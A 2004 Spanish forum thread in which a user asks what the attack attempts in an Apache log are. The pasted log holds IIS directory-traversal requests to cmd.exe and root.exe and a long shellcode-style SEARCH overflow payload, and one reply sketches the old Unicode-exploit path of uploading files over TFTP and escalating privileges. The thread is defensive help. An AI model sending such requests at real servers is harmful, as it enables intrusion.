BandaAncha

  • 🔍 en 📰 artículos ⏎
  • 🔍 en 💬 foros ⏎
  • 🔍 en 👇 este 💬 foro ⏎
  • 🔍 en 👇 este 💬 tema ⏎
Regístrate Regístrate Identifícate Identifícate

Que me estan intentando hacer?

1
albertodp

Esto es lo que me he encontrado al mirar el log de mi apache:

62.57.23.143 - - [12/Jun/2004:16:51:20 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
62.57.23.143 - - [12/Jun/2004:16:51:20 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
62.57.69.150 - - [12/Jun/2004:18:13:00 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\

...

x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 337 "-" "-"
62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"

Lo unico que se es que esa ip es de la misma red que la mia (Menta).

Gracias

Este tema está cerrado a nuevas respuestas. Abre un nuevo tema para retomar la conversación.
wileeam

Pos eso, alguien quiere ver si puede sacarte una consola :)
Aunque no creo que lo intente de nuevo, pues no ha obtenido resultados satisfactorios (404); usas Apache así que no creo que tengas muchos problemas.
Salu2

undertow

pega las lineas del log en google.
por ejemplo esta:
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"

encontraras mucha informacion.

anthrax

xDDDDDDDDD

Saludos 8)
P.D: Estos worms maliciosos ... ^^

ZEROCOOL

Debe ser que alguien está utilizando algun escáner contra tu servidor tipo Nessus, Languard...etc

Aunque creo que el nessus detecta el tipo de servidor y determina que plugins deben ser lanzados contra tu servidor, asi que debe de ser algún escáner un poco malo.

Saludos

Zangetsu

es un escaner sin duda no tubo ningun exito.. normalmente este tipo de vulneabilidades eran mas amplicas en la epoca de la vulneabilidad Unicode decode, en la ke se baso si no me equivoco o no recuerdo mal el famoso virus cojonero Redcode simplemente con dicha vulneabilidad conseguian mas o menos una consola podian listar.. copiar pegar.. y usar tecnicas de trasferencia del tipo TFTP que es un tipo de trasferencia de archivos con la que trabajan la mayoria de rooters por cierto, y utilizandola subias un archivo ke podia ser un virus y te las ingeniavas para elevear privilegios y tomar una consola admin

🗨️ 2
albertodp

Casi un año despues de poner el post, gracias

🗨️ 1
Nemigo

Las cosas de palacio van despacio. Ya sabes 8-)